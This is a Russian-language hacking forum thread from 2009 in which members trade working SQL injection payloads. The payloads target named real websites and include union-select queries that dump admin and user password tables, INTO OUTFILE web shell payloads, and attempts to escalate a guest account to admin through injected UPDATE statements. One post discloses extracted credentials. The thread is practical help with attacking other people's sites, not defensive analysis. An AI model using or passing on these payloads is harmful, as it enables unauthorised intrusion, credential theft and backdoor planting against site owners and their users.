Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    1. http://dontime.dn.ua/index.php?new=999999%20union%20select%201,2,3,4,version(),%20%206,7,8,9,10,11,12/*
    2. http://www.aroma-france.info/parfums.php?poll=17'+order+by+5--+
     
    #5041 R1dex, 28 Jan 2009
    Last edited: 28 Jan 2009
    2 people like this.
  2. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://www.aroma-france.info/parfums.php?poll=17%27/**/union/**/select%20version(),2,3,4,5--%20-
     
    1 person likes this.
  3. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Тупой вопрос. Как с помощью скули залить шелл?
    Или слить двиг?
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    2 Arigona поищи на форуме. есть куча флуда на енту тему да и тема есть отдельная
     
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    union+select+1,'<?php eval($_GET[‘cmd’]) ?>',3 INTO OUTFILE 'путь/shell.php'--
     
    #5045 R1dex, 28 Jan 2009
    Last edited: 28 Jan 2009
    1 person likes this.
  6. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    путь/shell.php это путь к шеллу лежащему к примеру на бесплатном хосте, или путь где сохраниться он?
     
  7. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    100
    Likes Received:
    22
    Reputations:
    -5
    Access denied for user 'a4860939_df'@'localhost' (using password: YES)

    Пишет -\
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    полный путь куда тебе надо залить шелл
    например /server/www/public_html/site/images/shell.php
    у каждого сайта свой путь по поводу путей опять же поищи на форумe
     
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Arigona Поиск по форуму, вот одна из тем:
    https://forum.antichat.ru/threadnav34338-1-10.html

    В этой теме , несколько страниц назад, велась та=же беседа на 10 листов,
    можешь почитать отсюда посты kevmen'а и ответы на них:
    https://forum.antichat.ru/threadnav46016-502-10.html
    не нужно её повторять, пожалуйста :)
     
  10. omel

    omel Elder - Старейшина

    Joined:
    26 Jun 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    У меня такой вопрос нашел SQL injection подобрал столбцы считал из базы хеши и бручу их. А пока брутяться хотел зайти в админку. (подобрал 1 пароль на пользователя с правами гость). Сформировал запрос http://****_id='99999'%20un ion+UPDA TE%20auth%20SET%20us er _type=admin%20WH ERE%20user_id=2
    чтобы обновить пользователя с правами гостя на админа (в базе есть права guest и admin ) и зайти в админку но фиг. Запрос выполняется но ничего в базе не изменяет. Что можно сделать, как изменить права?
     
    #5050 omel, 28 Jan 2009
    Last edited: 28 Jan 2009
  11. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Ты от гостя пароль подобрал? В админку гостем заходишь? Что за бред? Сделать тут можно только одно - учить FAQ и учить и учить и учить... Ты где-нибудь видел в факе, чтобы народе через инъекцию делал UNION на SELECT и UPDATE? Этого не возможно сделать!
     
  12. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    86
    Likes Received:
    44
    Reputations:
    6
    Народ,нужна помощь...думаю даже вам будет интересно...и так:
    есть скуль(5 ветка)
    Code:
    http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,username,3,password,5,6,7,8,9,10,11%20%20FROM%20admin
    login : admin
    pass : root78
    есть админка
    Code:
    http://www.krimsex.com/admin.php
    пароль не подходит. вопрос..почему?
    ето не все, то была табла admin,есть ещё табла users
    Code:
    http://www.krimsex.com/details_news.php?id=-112%20union%20select%201,login,3,password,5,6,7,8,9,10,11%20%20FROM%20users
    пробывал лимитом 10 акков,не один не подошол..
    вход для юзеров тут:
    Code:
    http://www.krimsex.com/login.php
    Очень большая просьба помочь
     
    #5052 TELO, 29 Jan 2009
    Last edited: 29 Jan 2009
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://site.ru/index.php?id=-1+union+select+null,COLUMN_NAME,TABLE_NAME,TABLE_S CHEMA+FROM+INFORMATION_SCHEMA.COLUMNS+where+TABLE_ NAME=(select+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1+offset+20)--

    Как выбрать отсюда поля определённой таблицы ? Не может же offset быть полем таблицы определённой,ибо там их больше ста =_=.Пусть таблица - offset 36

    ЗЫ: postgre_sql()
     
  14. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    86
    Likes Received:
    44
    Reputations:
    6
    Вот запрос - выдергивает все таблицы, в которых есть колонка "password"
    Code:
    UNION+SELECT+group_concat(table_name)+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264--
    так же в хексе можна вставить любое название колонки
     
  15. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    www.site.com/index.php?id=-1+union+select+null,COLUMN_NAME,null,null+from+INF ORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='таблица'--

    offset - это тот же limit в MYSQL.

    TELO,

    Надо не хексить, а переводить в char..
    К тому же, вопрос был совсем другой.
     
    #5055 R1dex, 29 Jan 2009
    Last edited: 29 Jan 2009
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    это почему?
     
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Вроде PostgreSql не поддерживает hex или я ошибаюсь?
     
  18. omel

    omel Elder - Старейшина

    Joined:
    26 Jun 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Просто пользователь называется guest. А сайт то самописный... нашел в базе столбец который дает права или админа или пользователя - usertype admin , guest , постандарту ставит всем guest. Помогите составить правильный запрос чтобы обновить поле с значение guest на админ. Пробовал вот такой запрос http://**/id=99999'%20UPDATE 'aut' SET usertype='admin' WHERE user_id=2 но база видает ошибку right syntax to use near 'UPDATE \'aut\' SET usertype=\'admin\' WHERE user_id=2' at line 1
     
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ах,да.Забыл упомянуть,что char не поддерживается и кавычки убийственны,посему и работают только подзапросы и запросы без кавычек =_=.Хекс тоже не катит.
     
    #5059 Велемир, 29 Jan 2009
    Last edited: 29 Jan 2009
    1 person likes this.
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    кавычки экранируются во первых...
     
Loading...
Thread Status:
Not open for further replies.